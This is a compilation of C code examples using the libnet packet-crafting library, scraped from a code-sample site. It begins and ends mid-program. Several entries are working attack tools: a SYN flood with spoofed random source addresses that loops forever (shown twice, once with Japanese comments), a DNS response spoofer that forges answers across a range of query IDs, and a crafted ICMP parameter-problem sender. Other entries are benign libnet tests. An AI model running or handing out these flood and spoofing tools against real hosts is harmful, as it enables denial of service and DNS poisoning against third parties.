   network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface 
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run as root.\n");

   libnet_init_packet(packet_size, &packet); // allocate memory for packet 
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand(); // seed the random number generator 

   printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // loop forever (until break by CTRL-C) 
   {
      libnet_build_ip(LIBNET_TCP_H,      // size of the packet sans IP header 
         IPTOS_LOWDELAY,                 // IP tos 
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
         0,                              // frag stuff 
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
         IPPROTO_TCP,                    // transport protocol 
         libnet_get_prand(LIBNET_PRu32), // source IP (randomized) 
         dest_ip,                        // destination IP 
         NULL,                           // payload (none) 
         0,                              // payload length 
         packet);                        // packet header memory 

      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) 
         dest_port,                      // destination TCP port 
         libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) 
         libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) 
         TH_SYN,                         // control flags (SYN flag set only) 
         libnet_get_prand(LIBNET_PRu16), // window size (randomized) 
         0,                              // urgent pointer 
         NULL,                           // payload (none) 
         0,                              // payload length 
         packet + LIBNET_IP_H);          // packet header memory 

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
         libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // inject packet 
      if (byte_count < packet_size)
         libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.  (%d of %d bytes)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds  
   }

   libnet_destroy_packet(&packet); // free packet memory 

   if (libnet_close_raw_sock(network) == -1) // close the network interface 
      libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");

   return 0;
}
Ejemplo n.º 17
0
int main(int argc, char **argv)
{
	u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
	u_long *problem = NULL;
	u_char *packet = NULL;
	int sock, c, len = 0;
	long acx, count = 1;
	struct icmp *icmp;
	struct ip *ip;

	/* It appears that most IP options of length >0 will work
	 * Works with 128, 64, 32, 16...  And the normal ones 137...
	 * Does not work with 0, 1 */
	u_char data[] = {137};
	int data_len = sizeof(data);

	printf("Written by Mike Frantzen...  <*****@*****.**>\n");
	printf("For test purposes only... yada yada yada...\n");

	src_ip = inet_addr("10.10.10.10");

	while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
	  switch(c) {
		case 'd':	dst_ip = libnet_name_resolve(optarg, 1);
				break;
		case 's':	src_ip = libnet_name_resolve(optarg, 1);
				break;
		case 'D':	ins_dst_ip = name_resolve(optarg, 1);
				break;
		case 'S':	ins_src_ip = name_resolve(optarg, 1);
				break;
		case 'l':	data_len = atoi(optarg);
				break;
		case 'c':	if ( (count = atol(optarg)) < 1)
					count = 1;
				break;
		default:	printf("Don't understand option.\n");
				exit(-1);
	  }
	}

	if ( dst_ip == 0 ) {
	    printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
		rindex(argv[0], '/') == NULL ? argv[0]
					: rindex(argv[0], '/') + 1);
	    printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
	    printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
	    exit(-1);
	}

	if ( ins_dst_ip == 0 )
		ins_dst_ip = src_ip;
	if ( ins_src_ip == 0 )
		ins_src_ip = dst_ip;

	if ( (packet = malloc(1500)) == NULL ) {
		perror("malloc: ");
		exit(-1);
	}
	if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
        	perror("socket: ");
        	exit(-1);
	}

	/* 8 is the length of the ICMP header with the problem field */
	len = 8 + IP_H + data_len;
	bzero(packet + IP_H, len);

        libnet_build_ip(len,                    /* Size of the payload */
                0xc2,                           /* IP tos */
                30241,                          /* IP ID */
                0,                              /* Frag Offset & Flags */
                64,                             /* TTL */
                IPPROTO_ICMP,                   /* Transport protocol */
                src_ip,                         /* Source IP */
                dst_ip,                         /* Destination IP */
                NULL,                           /* Pointer to payload */
                0,
                packet);                        /* Packet memory */


	/* ICMP Header for Parameter Problem
	 * --------------+---------------+---------------+---------------
	 *| Type (12)	 |    Code (0)	 |	Checksum		 |
	 * --------------+---------------+---------------+---------------
	 *| Pointer	 |		unused				 |
	 * --------------+---------------+---------------+---------------
	 * Internet Header + 64 bits of original datagram data....
	 */

	icmp = (struct icmp *) (packet + IP_H);
	problem = (u_long *) (packet + IP_H + 4);  /* 4 = ICMP header  */
	icmp->icmp_type	= ICMP_PARAMPROB;
	icmp->icmp_code	= 0;		/* Indicates a problem pointer */
	*problem = htonl(0x14000000);	/* Problem is 20 bytes into it */


	/* Need to embed an IP packet within the ICMP */
	ip = (struct ip *) (packet + IP_H + 8);	/* 8 = icmp header	*/
	ip->ip_v	= 0x4;			/* IPV4			*/
	ip->ip_hl	= 0xf;			/* Some IP Options	*/
	ip->ip_tos	= 0xa3;			/* Whatever		*/
	ip->ip_len	= htons(data_len);	/* Length of packet	*/
	ip->ip_id	= 30241;		/* Whatever		*/
	ip->ip_off	= 0;			/* No frag's		*/
	ip->ip_ttl	= 32;			/* Whatever		*/
	ip->ip_p	= 98;			/* Random protocol	*/
	ip->ip_sum	= 0;			/* Will calc later	*/
	ip->ip_src.s_addr = ins_src_ip;
	ip->ip_dst.s_addr = ins_dst_ip;

	/* Move our data block into the packet */
	bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);

	/* I hate checksuming.  Spent a day trying to get it to work in
	 * perl...  That sucked...  Tequilla would have helped immensly.
	 */
	libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);

	/* Bah...  See above comment.... */
	libnet_do_checksum(packet, IPPROTO_ICMP, len);


	printf("Sending %li packets", count);
	for (acx = 0; acx < count; acx++) {
	   if( libnet_write_ip(sock, packet, len + IP_H)  < (len + IP_H))
 		perror("write_ip: ");
	   else printf(".");
	}
	printf("\n\n");
	return( 0 );
}
Ejemplo n.º 18
0
int main (int argc, char **argv)   {
    u_long  src_ip,                 /* source address          */
            dst_ip;                 /* destination address     */
    u_short src_port,               /* source port             */
            dst_port,               /* destination port        */
            id;                     /* dns id we are spoofing  */
    int     written_bytes,          /* number of bytes written */
            packet_size,            /* size of our packet      */
            payload_size,           /* size of our payload     */
            socket;                 /* socket to write on      */
    u_char  *packet,                /* we build this           */
            *payload;               /* we send this            */

    if (argc < 6)   {
        printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n");
        exit (EXIT_FAILURE);
    }

    if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
        libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");

    src_ip   = libnet_name_resolve(argv[1], 0);
    dst_ip   = libnet_name_resolve(argv[3], 0);
    src_port = (u_short) atoi(argv[2]);
    dst_port = (u_short) atoi(argv[4]);
    id       = (u_short) atoi(argv[5]);

    payload      = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01";
    payload_size = 21;

    /*
     *  packet memory allocation
     */

    packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;

    libnet_init_packet(packet_size, &packet);
    if (packet == NULL)
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");

    /*
     *  ip header construction
     */

    libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
            0,                      /* ip tos              */
            0,                      /* ip id               */
            0,                      /* fragmentation bits  */
            64,                     /* ttl                 */
            IPPROTO_UDP,            /* protocol            */
            src_ip,                 /* source address      */
            dst_ip,                 /* destination address */
            NULL,                   /* payload             */
            0,                      /* payload length      */
            packet);                /* packet buffer       */

     /*
      * udp header construction
      * during debugging i found that we weren't generating the correct
      * length here, that is why a payload length is included (payload + dns_header)
      * it really shouldn't be here though
      */

    libnet_build_udp(src_port,      /* source port      */
            dst_port,               /* destination port */
            NULL,                   /* payload          */
            33,                     /* payload length   */
            packet + LIBNET_IP_H);

    /*
     *  dns header construction
     */

    libnet_build_dns(id,            /* dns id                    */
            0x0100,                 /* control flags             */
            1,                      /* number of questions       */
            0,                      /* number of answer RR's     */
            0,                      /* number of authority  RR's */
            0,                      /* number of additional RR's */
            payload,                /* payload                   */
            payload_size,           /* payload length            */
            packet + LIBNET_IP_H + LIBNET_UDP_H);

    /*
     *  calculate checksum
     */

    libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);

    /*
     *  write packet
     */

    written_bytes = libnet_write_ip(socket, packet, packet_size);

    /*
     *  make sure the number of written bytes jives with what we expect
     */

    if (written_bytes < packet_size)
        libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);

    /*
     *  we're done with this packet
     */

    libnet_destroy_packet(&packet);

    /*
     *  we're done writing
     */

    if (libnet_close_raw_sock(socket) == -1)
        libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");

    return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 19
0
int
main(int argc, char **argv)
{
    int sock, c;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char *cp, *buf;

    printf("TCP packet building/writing test\n");

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;
    while((c = getopt(argc, argv, "d:s:")) != EOF)
    {      
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                dst_prt = (u_short)atoi(cp);
                if (!(dst_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
            case 's':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                src_prt = (u_short)atoi(cp);
                if (!(src_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
        }
    }
    if (!src_ip || !src_prt || !dst_ip || !dst_prt)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    /*
     *  Get our block of memory for the packet.  In this case, we only need
     *  memory for the packet headers.
     */
    buf = malloc(IP_MAXPACKET);
    if (!buf)
    {
        perror("No memory for packet header");
        exit(EXIT_FAILURE);
    }

    /*
     *  Open our raw IP socket and set IP_HDRINCL.
     */
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(EXIT_FAILURE);
    }
    
    /*
     *  Build the IP header (shown exploded for commenting).
     */
    libnet_build_ip(LIBNET_TCP_H,            /* Size of the payload */
            IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
            242,                            /* IP ID */
            0,                              /* Frag stuff */
            48,                             /* TTL */
            IPPROTO_TCP,                    /* Transport protocol */
            src_ip,                         /* Source IP */
            dst_ip,                         /* Destination IP */
            NULL,                           /* Pointer to payload (none) */
            0,
            buf);                           /* Packet header memory */

    /*
     *  Build the TCP header.
     */
    libnet_build_tcp(src_prt,               /* Source TCP port */
            dst_prt,                        /* Destination TCP port */
            11111,                          /* Sequence number */
            99999,                          /* Acknowledgement number */
            TH_SYN,                         /* Control flags */
            1024,                           /* Window size */
            0,                              /* Urgent pointer */
            NULL,                           /* Pointer to payload (none) */
            0,
            buf + LIBNET_IP_H);             /* Packet header memory */

    /*
     *  Calculate the TCP header checksum (IP header checksum is *always* done
     *  by the kernel.
     */
    libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H);

    /*
     *  Write the packet to the network.
     */
    c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H);
    if (c < LIBNET_TCP_H + LIBNET_IP_H)
    {
        fprintf(stderr, "libnet_write_ip\n");
    }
    printf("Completed, wrote %d bytes\n", c);
    free(buf);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 20
0
int main (int argc, char **argv)   {
    u_long  src_ip,                 /* source address          */
            dst_ip;                 /* destination address     */
    u_short src_port,               /* source port             */
            dst_port,               /* destination port        */
            id;                     /* dns id we are spoofing  */
    int     i,						/* loop counter            */
    		written_bytes,          /* number of bytes written */
            packet_size,            /* size of our packet      */
            payload_size,           /* size of our payload     */
            npackets,				/* num of packet to write  */
            socket;                 /* socket to write on      */
    u_char  *packet,                /* we build this           */
            *payload;               /* we send this            */

    if (argc < 7)   {
        printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n");
        exit (EXIT_FAILURE);
    }

    if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
        libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");

    src_ip   = libnet_name_resolve(argv[1], 0);
    dst_ip   = libnet_name_resolve(argv[3], 0);
    src_port = (u_short) atoi(argv[2]);
    dst_port = (u_short) atoi(argv[4]);
    id       = (u_short) atoi(argv[5]);
    npackets = (int)     atoi(argv[6]);


    payload = /* question section name/types, size: 21  */
              "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"

              /* answer section, names/types, size: 21  */
              "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"

              /* answer section, ttl, size: 4           */
              "\xff\xff\xff\xff"

              /* answer section, rdata length, size: 2  */
              "\x00\x04"

              /* answer section, rdata, size: 4         */
              "\x81\x51\xe0\x43";

    payload_size = 52;

    /*
     *  packet memory allocation
     */

    packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;

    libnet_init_packet(packet_size, &packet);
    if (packet == NULL)
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");

    /*
     *  ip header construction
     */

    libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
            0,                      /* ip tos              */
            10951,                  /* ip id               */
            0,                      /* fragmentation bits  */
            64,                     /* ttl                 */
            IPPROTO_UDP,            /* protocol            */
            src_ip,                 /* source address      */
            dst_ip,                 /* destination address */
            NULL,                   /* payload             */
            0,                      /* payload length      */
            packet);                /* packet buffer       */

     /*
      * udp header construction
      * during debugging i found that we weren't generating the correct
      * length here, that is why a payload length is included (payload + dns_header)
      * it really shouldn't be here though
      */

    libnet_build_udp(src_port,      /* source port      */
            dst_port,               /* destination port */
            NULL,                   /* payload          */
            payload_size + 12,      /* payload length   */
            packet + LIBNET_IP_H);

	/*
	 *  write npackets
	 *  we loop from here because we must change the dns id and also re-checksum
	 */
    
    printf("\nwriting packets");
    for (i = 0; i < npackets; i++)	{
    	printf(".");
    	
	    /*
	     *  dns header construction
	     */
	
	    libnet_build_dns(id+i,          /* dns id                    */
	            0x8180,                 /* control flags             */
	            1,                      /* number of questions       */
	            1,                      /* number of answer RR's     */
	            0,                      /* number of authority  RR's */
	            0,                      /* number of additional RR's */
	            payload,                /* payload                   */
	            payload_size,           /* payload length            */
	            packet + LIBNET_IP_H + LIBNET_UDP_H);
	
	    /*
	     *  calculate checksum
	     */
	
	    libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
	
	    /*
	     *  write packet
	     */
	
	    written_bytes = libnet_write_ip(socket, packet, packet_size);
	
	    /*
	     *  make sure the number of written bytes jives with what we expect
	     */
	
	    if (written_bytes < packet_size)
	        libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
	}
	
    /*
     *  cleanup
     */

    libnet_destroy_packet(&packet);

    if (libnet_close_raw_sock(socket) == -1)
        libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
	
	printf("\n");
	
    return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 21
0
int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
   dest_port = (u_short) atoi(argv[2]); // ポート番号 


   network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run as root.\n");
   libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand(); // 乱数生成器に種を与える

   printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // 永久ループ(CTRL-Cで終了されるまで)
   {
      libnet_build_ip(LIBNET_TCP_H,      // IPヘッダを除いたパケットのサイズ
         IPTOS_LOWDELAY,                 // IP tos 
         libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
         0,                              // 断片化 
         libnet_get_prand(LIBNET_PR8),   // TTL (乱数化)
         IPPROTO_TCP,                    // トランスポートプロトコル
         libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
         dest_ip,                        // 宛先IP 
         NULL,                           // ペイロード(なし)
         0,                              // ペイロード長
         packet);                        // パケットヘッダメモリ

      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
         dest_port,                      // 宛先TCPポート
         libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
         libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
         TH_SYN,                         // コントロールフラグ (SYNフラグのみ設定)
         libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
         0,                              // 至急ポインタ
         NULL,                           // ペイロード (なし)
         0,                              // ペイロード長
         packet + LIBNET_IP_H);          // パケットヘッダメモリ

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
         libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
      if (byte_count < packet_size)
         libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.  (%d of %d bytes)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
   }

   libnet_destroy_packet(&packet); // パケットメモリを解放する

   if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
      libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");

   return 0;
}
Ejemplo n.º 22
0
int
main(int argc, char **argv)
{
    int sock, n, c, p_num;
    struct libnet_arena arena, *arena_p;
    u_char *packets[10];
    u_long src_ip, dst_ip;
    
    printf("ICMP_ECHO / Arena allocator test\n");

    src_ip = 0;
    dst_ip = 0;
    while((c = getopt(argc, argv, "d:s:")) != EOF)
    {
        switch (c)
        {
            case 'd':
                if (!(dst_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(1);
                }
                break;
            case 's':
                if (!(src_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(1);
                }
                break;
        }
    }
    if (!src_ip || !dst_ip)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    arena_p = &arena;
    p_num = 10;
    if (libnet_init_packet_arena(&arena_p, p_num, LIBNET_ICMP_ECHO_H +
                LIBNET_IP_H) == -1)
    {
        fprintf(stderr, "libnet_init_packet_arena failed\n");
        exit(EXIT_FAILURE);
    }
    else
    {
        printf("Allocated an arena of %ld bytes..\n",
            LIBNET_GET_ARENA_SIZE(arena));
    }

    /*
     *  Open our raw IP socket and set IP_HDRINCL.
     */
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(EXIT_FAILURE);
    }
    
    for (n = 0; n < p_num; n++)
    {
        printf("%ld bytes remaining in arena\n",
            LIBNET_GET_ARENA_REMAINING_BYTES(arena));
        packets[n] = libnet_next_packet_from_arena(&arena_p,
            LIBNET_ICMP_ECHO_H + LIBNET_IP_H);
        if (!packets[n])
        {
            fprintf(stderr, "Arena is empty\n");
            continue;
        }

        /*
         *  Build the IP header (shown exploded for commenting).
         */
        libnet_build_ip(LIBNET_ICMP_ECHO_H,     /* Size of the payload */
                IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
                242,                            /* IP ID */
                0,                              /* Frag stuff */
                48,                             /* TTL */
                IPPROTO_ICMP,                   /* Transport protocol */
                src_ip,                         /* Source IP */
                dst_ip,                         /* Destination IP */
                NULL,                           /* Pointer to payload (none) */
                0,
                packets[n]);                    /* Packet header memory */

        /*
         *  Build the ICMP header.
         */
        libnet_build_icmp_echo(ICMP_ECHO,       /* type */
                0,                              /* code */
                242,                            /* id */
                1,                              /* seq */
                NULL,	                        /* pointer to payload */
                0,                              /* size of payload */
                packets[n] + LIBNET_IP_H);      /* packet header memory */

        if (libnet_do_checksum(packets[n], IPPROTO_ICMP, LIBNET_ICMP_ECHO_H)
                    == -1)
        {
            fprintf(stderr, "Can't do checksum!\n");
        }

        /*
         *  Write the packet to the network.
         */
        c = libnet_write_ip(sock, packets[n], LIBNET_ICMP_ECHO_H + LIBNET_IP_H);
        if (c < LIBNET_ICMP_ECHO_H + LIBNET_IP_H)
        {
            fprintf(stderr, "write_ip\n");
        }
        printf("Completed %d of %d, wrote %d bytes\n", n + 1, p_num, c);
    }

    libnet_destroy_packet_arena(&arena_p);
    /* Blah. */
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 23
0
void send_packet(char *protocol, int sport2, int dport2, int id, int ttl, int count, const u_char *payload, int payload_size) {

	char errbuf[LIBNET_ERRBUF_SIZE];   /* error buffer */
	struct libnet_link_int *network;   /* pointer to link interface struct */
    int packet_size;                   /* size of our packet */
    int ip_size;				       /* size of our ip */
    int udp_size;                           /* size of our udp */
    int tcp_size;                           /* size of our tcp */
	int c;                
    u_char *packet;                    /* pointer to our packet buffer */
	
	  
    /*
     *  Step 1: Network Initialization (interchangable with step 2).
     */
	if ((network = libnet_open_link_interface(dev2, errbuf)) == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", errbuf);
    }

    /*
     *  We're going to build a UDP packet with a payload using the
     *  link-layer API, so this time we need memory for a ethernet header
     *  as well as memory for the ICMP and IP headers and our payload.
     */
	if (protocol == "udp") {
		packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_UDP_H + payload_size;
		ip_size = LIBNET_IP_H + LIBNET_UDP_H + payload_size;
		udp_size = LIBNET_UDP_H + payload_size;

		/*
		*  Step 2: Memory Initialization (interchangable with step 1).
		*/
		if (libnet_init_packet(packet_size, &packet) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
		}

		/*
		*  Step 3: Packet construction (ethernet header).
		*/
		libnet_build_ethernet(
				enet_dst,
				enet_src,
				ETHERTYPE_IP,
				NULL,
				0,
				packet);

		printf("\n--- Injected packet number %i on %s ---\n", count, dev2);

		/*
		*  Step 3: Packet construction (IP header).
		*/
		libnet_build_ip(
				LIBNET_UDP_H + payload_size,
				0,                      /* IP tos */
				id,                     /* IP ID */
				0,                      /* Frag */
				ttl,                    /* TTL */
				IPPROTO_UDP,            /* Transport protocol */
				inet_addr(saddr2),         /* Source IP */
				inet_addr(daddr2),         /* Destination IP */
				payload,                   /* Pointer to payload (none) */
				0,
				packet + LIBNET_ETH_H); /* Packet header memory */

		/*
		*  Step 3: Packet construction (UDP header).
		*/
		libnet_build_udp(
				sport2,                 /* source port */
				dport2,                 /* dest. port */
				payload,                /* payload */ 
				payload_size,           /* payload length */ 
				packet + LIBNET_ETH_H + LIBNET_IP_H);
	
		/*
		*  Step 4: Packet checksums (ICMP header *AND* IP header).
		*/
		if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
		}
		if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
		}
		
		
		/* print packet info */
		if (!hide_header) {
			printf("IP header    Src Addr: %s", saddr2);
			printf("   Dst Addr: %s\n", daddr2);
			printf("             Len: %i   ID: %i   TTL: %i\n", ip_size, id, ttl);
			printf("UDP header   Src port: %i   Dst port: %i   Len: %i\n", sport2, dport2, udp_size);
		}
		if (!hide_payload) {
			printf("Payload (%d bytes)\n", payload_size);
			print_payload(payload, payload_size);
		}
	}
	
	if (protocol == "tcp") {
		packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H + payload_size;
		ip_size = LIBNET_IP_H + LIBNET_TCP_H + payload_size;
		tcp_size = LIBNET_TCP_H + payload_size;
		
		/*
		*  Step 2: Memory Initialization (interchangable with step 1).
		*/
		if (libnet_init_packet(packet_size, &packet) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
		}

		/*
		*  Step 3: Packet construction (ethernet header).
		*/
		libnet_build_ethernet(
				enet_dst,
				enet_src,
				ETHERTYPE_IP,
				NULL,
				0,
				packet);

		printf("\n--- Injected packet number %i on %s ---\n", count, dev2);

		/*
		*  Step 3: Packet construction (IP header).
		*/
		libnet_build_ip(
				LIBNET_TCP_H + payload_size,
				0,                      /* IP tos */
				id,                     /* IP ID */
				0,                      /* Frag */
				ttl,                    /* TTL */
				IPPROTO_TCP,            /* Transport protocol */
				inet_addr(saddr2),         /* Source IP */
				inet_addr(daddr2),         /* Destination IP */
				payload,                /* Pointer to payload */
				0,
				packet + LIBNET_ETH_H); /* Packet header memory */

		/*
		*  Step 3: Packet construction (TCP header).
		*/
		libnet_build_tcp(
				sport2,                /* source TCP port */
				dport2,                /* destination TCP port */
				0xa1d95,                /* sequence number */
				0x53,                   /* acknowledgement number */
				TH_SYN,                 /* control flags */
				1024,                   /* window size */
				0,                      /* urgent pointer */
				NULL,                   /* payload (none) */
				0,                      /* payload length */
				packet + LIBNET_ETH_H + LIBNET_IP_H);
	
		/*
		*  Step 4: Packet checksums (ICMP header *AND* IP header).
		*/
		if (libnet_do_checksum(packet + ETH_H, IPPROTO_TCP, LIBNET_TCP_H + payload_size) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
		}
		if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) {
			libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
		}
		
		/* print packet info */
		if (!hide_header) {
			printf("IP header    Src Addr: %s", saddr2);
			printf("   Dst Addr: %s\n", daddr2);
			printf("             Len: %i   ID: %i   TTL: %i\n", ip_size, id, ttl);
			printf("TCP header   Src port: %i   Dst port: %i   Len: %i\n", sport2, dport2, tcp_size);
		}
		if (!hide_payload) {
			printf("Payload (%d bytes)\n", payload_size);
			print_payload(payload, payload_size);
		}
	}

	/*
	 *  Step 5: Packet injection.
	 */
	c = libnet_write_link_layer(network, dev2, packet, packet_size);
	if (c < packet_size) {
		libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
	}

    /*
     *  Shut down the interface.
     */
    if (libnet_close_link_interface(network) == -1) {   
        libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
    }

    /*
     *  Free packet memory.
     */
    libnet_destroy_packet(&packet);
	printf("\n");
}
Ejemplo n.º 24
0
/******************************************************************************
 *  spoof_dns                                                                 *
 *                                                                            *
 *  check some conditions, build the actual packet, and write the answer      *
 *  arg1: (int) socket to write on                                            *
 *  ret:  none                                                                *
 ******************************************************************************/
void spoof_dns (int socket)   {
    struct  in_addr src, dst;       /* used for printing addresses */
    int     written_bytes,          /* number of bytes written     */
            packet_size,            /* size of our packet          */
            i;                      /* misc                        */
    u_char  *packet;                /* we build this               */

    /*
     *  check the following conditions before spoofing
     *  if any of these conditions are violated then no spoofing is done
     *  - we only want to spoof packets from a nameserver
     *  - we only want to spoof packets from questions of type A
     *  - we only want to spoof packets if we have an answer
     */

    if (ntohs(chewycenter.dst_port) != 53) {
        if (!sflag) {
            printf("\nignoring packet:     destination not a nameserver");
            printf("\n--");
        }
        return;
    }

    if (!chewycenter.is_a)  {
        if (!sflag) {
            printf("\nignoring packet:     question is not of type A");
            printf("\n--");
        }
        return;
    }

    if (!chewycenter.have_answer)   {
        if (!sflag) {
            printf("\nignoring packet:     no answer for this question");
            printf("\n--");
        }
        return;
    }

    /*
     * if we're here it means we're ready to spoof an answer, lets reflect that
     * in the spoofed answers count
     */

    num_spoofed_answers++;

    /*
     *  packet memory allocation
     */

